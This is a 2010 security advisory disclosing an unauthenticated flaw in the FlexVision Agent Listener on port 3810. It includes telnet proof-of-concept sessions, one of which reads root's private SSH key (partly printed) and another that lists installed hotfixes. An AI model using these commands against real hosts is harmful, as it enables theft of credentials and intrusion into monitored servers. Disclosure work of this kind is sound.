=====[ Tempest Security Intelligence - Advisory #02 / 2010 ]=============
 
       Information Disclosure Vulnerability in FlexVision Agent Listener
       -----------------------------------------------------------------
 
 
  Authors: Victor Ribeiro Hora <victor *SPAM* tempest.com.br
<http://tempest.com.br>>
           Tempest Security Intelligence - Brazil
 
 
=====[ Table of Contents ]=================================
 
 1. Overview
 2. Detailed description
 3. Additional context & Solutions
 4. References
 5. Thanks
 
 
=====[ Overview ]======================================
 
 * System affected: FlexVision Agent Listener 1.3 for Windows, Linux and
Solaris
   (other versions may be vulnerable)
 
 * Release date: 22 October 2010
 
 * Impact: Successful exploitation of this vulnerability may lead to
remote server sensitive information disclosure.
 
FlexVision [1] claims to be an IT service focused on hardware and
software management, offering features like capacity planning, SLA
monitoring and systems inventory. The service is used by several major
companies in Brazil, including banking, telecom, energy, health and
independent product sectors.
 
The vulnerability was found in the inventory agent listener or "fval".
Exploitation of this weakness does not require any authentication and
may lead to remote disclosure of sensitive information from the server
running the agent.
 
Specifically, an attacker can download non-binary files, and list
running services, running processes and installed software. It seems
there is some active filtering for known sensitive data, but other
sensitive information may leak.
 
=====[ Detailed description ]================================
 
FlexVision Inventory service has several agents (servers) to collect
data from different platforms and send them to a central console on the
network. These agents are installed on the hardware to be monitored and
listen for incoming client connections.
 
One of the agents that was analyzed is the "FlexVision Actions Listener
1.3 for Linux", used for the inventory of Linux systems. This agent is
executed by a Linux binary called "fval" started at boot time through an
initscript in /etc/init.d/rc.fval. Apparently the fval binary executes a
chdir() to /opt/flex/plugins, then it opens a socket listening for
connections on port 3810/TCP in daemon mode.
 
As soon as the TCP Three-Way Handshake is completed, the agent keeps
waiting for "commands" to perform the various inventory functions. These
commands are interpreted as internal functions of the fval binary, such
as help, version, exit or run. 
 
Specifically, the run function expects a parameter. We noted that this
parameter is a bash script file in the /opt/flex/plugins directory. This
script is executed by the fval binary, and the output of the script is
returned on the same TCP connection to the central console application.
These commands are normally sent from a central console to the monitored
agent.
 
 As the connection is not authenticated nor encrypted in any way, it
gives the possibility of any computer that has access to the 3810/TCP
port of any agent, sending commands to be executed by the agent.
 
In spite of the fact that the agent uses an active filter for some well
known sensitive data (like password hashes in the "shadow" file, for
example), it is possible to get other not easily predictable but
sensitive data. Some special chars we tested were also filtered, such as
'*',  ';',  '>' , and also white spaces, tabs and other special
delimiters used on bash and other shells.


The following is an example of the recovery of a private SSH RSA key
file that belongs to the root user on a Linux server:
 
-----------------------------------------------------------------------
 
vrh@victim01:~$ telnet 192.168.1.1 3810
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
FVAL>run symonfile.sh /root/.ssh id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA3wKpWZ0xgmIWX4JVb72wt5STGdhr2x0whvY25hhNfI9zpNIG
eV0zRXy4hbVqRvcJVu3+Ho6ZyXIg8bVzljFJdx/anBs5KLrlvfoMDrgwNWtp8Slz
Fuhfp7ej0wr57ZRyKq4imz3vvle24SRtROymSMDCtolbY4wZFCRu6JJ+3jAVqlxJ
9YMdVqL7BoF0Nbp+s7FqIdbpwwOtcS0PpprvWTbFcQ+z3ReN7B7SybZTkuZPD56o
z1QtnzhgnVFHBD3TPXPorKf42uuDeW3twFKYlFOuSmz46tKCsbBoM8TBPNtYCvAe
3G7Aj0R/jvBdL9+hz/cG+riwL0NYTSe7uTO4kQIBIwKCAQATHXw64ZaHhMAW0Kg8
xx3Gl7TWVGEEJxLJvVUpqk/I2RiKeGb0dbPwA2BF+ZtlKx4Ow/E10bVpCchPO3BO
s8R37MmYWhrXmv2/05qiLQtySwkUq8gJRx4kUZGzAPDZ2YYg6lq82WxSJMaIU5RW
XW1WsW/GgM1RrOw07S4T70yz9VUvFo4M5m7GMP0AjffvJv8dhABNRPV1uzBGqjyV
 
-----------------------------------------------------------------------
 
Just like Linux fval, on Windows it's also possible to dump any
non-binary file. It's worth saying that as fval always runs as
privileged user (Administrator/root), all the system files are
accessible and most of them are readable.
 
Windows hosts behave similary. As soon as the Agent is installed, it is
registered as a System Service and runs at boot time. This service runs
the fval binary located at %SystemDrive%\%ProgramFiles%\Flexvision.
Then, fval will run any file in the
%SystemDrive%\%ProgramFiles%\Flexvision\Plugins directory.
 
By default, Windows fval has several 32bit Portable Executable (.EXE)
files to provide inventory data to the central console, but most
interesting is the hotfix.exe file, which lists all the installed
HotFixes on the host:
 
-----------------------------------------------------------------------
 
vrh@victim01:~$ telnet 192.168.1.2 3810
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
FVAL>run hotfix.exe
Hot Fix ID.75=File 1
Service pack afetado.75=KB956801
Instalado por.75=
Descricao.76=
Hot Fix ID.76=File 1
Service pack afetado.76=KB956806
Instalado por.76=
Descricao.77=
Hot Fix ID.77=File 1
Service pack afetado.77=KB956848
Instalado por.77=
 
-----------------------------------------------------------------------

With that sort of info it would be possible to plan and execute a much
more precise attack against the host.
 
=====[ Other contexts & Solutions ]============================
 
As usual [2], we contacted the vendor. After some weeks, they released
version 1.4 that usessource IP based access (whitelist policy) and a
static key for authentication, but nothing to address the actual
problem: no strong authentication scheme and no encrypted client-server
traffic. Version 2.0 was just released, the vendor states that this
version uses encrypted client-server communication, but we were unable
to test it until now. After waiting a few months, FlexVision did not
provide us a public URL with an actual fix which addresses this problem
to attach in this publication. 

=====[ Thanks ]========================================
 
 - Tempest Security Intelligence [3] - Tempest MSS Team
 - Evandro Curvelo Hora <evandro *SPAM* tempest.com.br
<http://tempest.com.br>>
 - Marco "Kiko" Carnut <kiko *SPAM* tempest.com.br <http://tempest.com.br>>
 - Cristiano Lincoln Mattos <lincoln *SPAM* tempest.com.br
<http://tempest.com.br>>
 - Aldo Albuquerque <aldo *SPAM* tempest.com.br <http://tempest.com.br>>
 
=====[ References ]======================================
 
 [1] http://www.flexvision.com.br/
 [2] http://www.cert.org/kb/vul_disclosure.html
 [3] http://www.tempest.com.br/
 
===================================================

-- 
Victor Ribeiro Hora <victor@tempest.com.br>
Network Security Analyst & Security Baselines development
Tempest Security Intelligence
www.tempest.com.br